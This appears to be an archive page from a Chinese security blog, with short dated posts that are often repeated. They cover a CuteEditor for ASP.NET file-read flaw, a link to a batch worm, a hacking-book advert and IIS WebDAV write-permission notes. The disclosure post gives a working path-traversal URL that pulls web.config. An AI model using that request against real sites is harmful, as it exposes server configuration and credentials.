May
30
今天让遇见一个 14 岁的小青年,跟我外甥一般大,而且技术相当不错,14岁懂的很多,杀毒、批处理、汇编、破解都不错,在我远程他机器的时候,电脑里面资料特多,黑客技术也是很多,看样子安全搞的也还不错,而且据他本人说,还要努力学习C语言,真不错!想想他的岁数,和我外甥一样大,但是却很强,真的找到一个符合我blog 上的名言那句话!
只给一下该小伙的一个批处理程序:
本人自己编写的bat蠕虫:http://bbs.verybat.org/thread-17840-1-1.html
只给一下该小伙的一个批处理程序:
本人自己编写的bat蠕虫:http://bbs.verybat.org/thread-17840-1-1.html
May
28
如题,500 块买了一个教训!记住,记住!具体就不说了,只能说俺太单纯了,以后的路真的要小心,要成熟了。。。
May
27
之前我暴过一漏洞,Cute Editor for ASP.NET vulnerability :http://www.woyigui.cn/CuteEditor-vulnerability/ ,今天小色给我说,有人发 milw0rm 上面了,一看就是真的,NND。。。。地址:http://www.milw0rm.com/exploits/8785
难道是巧合?还是盗版? ,注意看,他把国内的http://cuteeditor.51aspx.com也发出来了,关键是这漏洞我一年前就知道了,只不过没发,可想而知!
难道是巧合?还是盗版? ,注意看,他把国内的http://cuteeditor.51aspx.com也发出来了,关键是这漏洞我一年前就知道了,只不过没发,可想而知!
May
22
####### by woyigui #######
#### www.woyigui.cn ######
一、漏洞描述:
CuteEditor for ASP.NET是建立在Html基础之上,最简单易用、功能最强大的所见即所得Asp.net在线编辑器。 CuteEditor可以帮助Asp.net开发者轻松的对原来文本框(Textarea)中的内容(包括文字、图片等Html内容)进行编辑,更重要得是这些内容编辑的实现是所见即所得方式。 CuteEditor还集成了文件(包括图片、文档等)上传、媒体(包括视频、声音等)文件直接插入等对你来说非常实用的功能模块。
但是在 Load.ashx 文件中,未对 file 参数进行处理,可以加载任意文件。
二、官方地址:
http://cutesoft.net/
http://cuteeditor.51aspx.com/
三、利用方法:
http://www.woyigui.cn/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
#### www.woyigui.cn ######
一、漏洞描述:
CuteEditor for ASP.NET是建立在Html基础之上,最简单易用、功能最强大的所见即所得Asp.net在线编辑器。 CuteEditor可以帮助Asp.net开发者轻松的对原来文本框(Textarea)中的内容(包括文字、图片等Html内容)进行编辑,更重要得是这些内容编辑的实现是所见即所得方式。 CuteEditor还集成了文件(包括图片、文档等)上传、媒体(包括视频、声音等)文件直接插入等对你来说非常实用的功能模块。
但是在 Load.ashx 文件中,未对 file 参数进行处理,可以加载任意文件。
二、官方地址:
http://cutesoft.net/
http://cuteeditor.51aspx.com/
三、利用方法:
http://www.woyigui.cn/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
May
21
ps: 第一次帮人AD一下,也不算AD,有朋友想学习的就买来看了。。最近看见好多人都自己写书了。难道这是趋势?
官方连接:http://www.nohack.cn/bbs/thread-96363-1-1.html
新书预告<黑客渗透笔记>快赏
淘宝预定地址:http://item.taobao.com/auction/i ... 98c44&x_id=0db2
菜鸟起飞,从这里开始!本笔记将透露:
渗透、术语、脚本、内网、溢出……各种攻击相关的手段和名词
总结、技巧、细节、亮点……不断变化的攻击思想
ASP、PHP、JSP等不同类型的脚本漏洞
ACCESS、MYSQL、MSSQL、ORACLE等不同类型的数据库缺陷
国内、国外已知和末知的渗透工具
……
还等什么,一起高飞!
官方连接:http://www.nohack.cn/bbs/thread-96363-1-1.html
新书预告<黑客渗透笔记>快赏
淘宝预定地址:http://item.taobao.com/auction/i ... 98c44&x_id=0db2
菜鸟起飞,从这里开始!本笔记将透露:
渗透、术语、脚本、内网、溢出……各种攻击相关的手段和名词
总结、技巧、细节、亮点……不断变化的攻击思想
ASP、PHP、JSP等不同类型的脚本漏洞
ACCESS、MYSQL、MSSQL、ORACLE等不同类型的数据库缺陷
国内、国外已知和末知的渗透工具
……
还等什么,一起高飞!
May
20
挺郁闷的事情,刚开始我以为下载的iso 有问题,换了三四个。
症状:
在 Service Pack 4 (SP 4) 运行 Microsoft Windows Server 2003,Microsoft Windows Storage Server 2003 或 Microsoft Windows 2000 的服务器上, 尝试安装 Microsoft SQL Server 2000 通过批量许可协议 (VLA) 媒体。 执行此操作时您会收到下面的错误信息,SQL Server 安装向导 CD KEY 页上:
解决方案:
定位到注册表以下键值:
HKEY_LOCAL_MACHINE\System\Control\Session Manager
请作为 DWORD 值创建或者修改 SafeDllSearchMode 注册表项,将值从 1 更改为 0,然后单击 确定 。
症状:
在 Service Pack 4 (SP 4) 运行 Microsoft Windows Server 2003,Microsoft Windows Storage Server 2003 或 Microsoft Windows 2000 的服务器上, 尝试安装 Microsoft SQL Server 2000 通过批量许可协议 (VLA) 媒体。 执行此操作时您会收到下面的错误信息,SQL Server 安装向导 CD KEY 页上:
无法验证产品密钥
解决方案:
定位到注册表以下键值:
HKEY_LOCAL_MACHINE\System\Control\Session Manager
请作为 DWORD 值创建或者修改 SafeDllSearchMode 注册表项,将值从 1 更改为 0,然后单击 确定 。
May
15
终于把XSS_Attacks这本书看完了。学到了很多,非常不错的书。不过全英的,有些概念还要慢慢消化一下。接着就是把刚买的9本书看看。嗯。坚持看书!
今天空间到期了,又续了一年费。不过还算便宜,一年 35 块。因为以前给论坛买空间成了代理,便宜好多,如果大家需要,可以找我,我按代理价给大家开。呵呵。
今天空间到期了,又续了一年费。不过还算便宜,一年 35 块。因为以前给论坛买空间成了代理,便宜好多,如果大家需要,可以找我,我按代理价给大家开。呵呵。
May
15
//还是要象征性的加个版权,转载请注明b0r3d's blog http://www.b0r3d.org
//上个月给黑手投去了,人家既然没有发表,我就发出来吧,毕竟文章的原创内容太少,技术含量也没有多高。
最近对IIS的一些安全设置做了下总结,在查找配置写权限漏洞得时候,网上介绍的资料不多,现在就只有自己动手配置了。配置写权限漏洞的时候又对写权限有了一些新的认识。网上对写权限得介绍一般都为,由于服务器得配置不当,用户可以匿名上传一些文件或者是代码。常用的利用工具有zwell的IIS put scanner和老兵的写权限利用工具,本文就不再对利用方法进行介绍了,介绍得文章或者是动画已经很烂了。
写权限漏洞主要跟IIS的webdav服务扩展还有网站的一些权限设置有关系。下面我们先看下webdav的一些官方介绍
允许客户发布、锁定和管理 Web 上的资源,它允许客户端执行以下操作:
//上个月给黑手投去了,人家既然没有发表,我就发出来吧,毕竟文章的原创内容太少,技术含量也没有多高。
最近对IIS的一些安全设置做了下总结,在查找配置写权限漏洞得时候,网上介绍的资料不多,现在就只有自己动手配置了。配置写权限漏洞的时候又对写权限有了一些新的认识。网上对写权限得介绍一般都为,由于服务器得配置不当,用户可以匿名上传一些文件或者是代码。常用的利用工具有zwell的IIS put scanner和老兵的写权限利用工具,本文就不再对利用方法进行介绍了,介绍得文章或者是动画已经很烂了。
写权限漏洞主要跟IIS的webdav服务扩展还有网站的一些权限设置有关系。下面我们先看下webdav的一些官方介绍
允许客户发布、锁定和管理 Web 上的资源,它允许客户端执行以下操作:
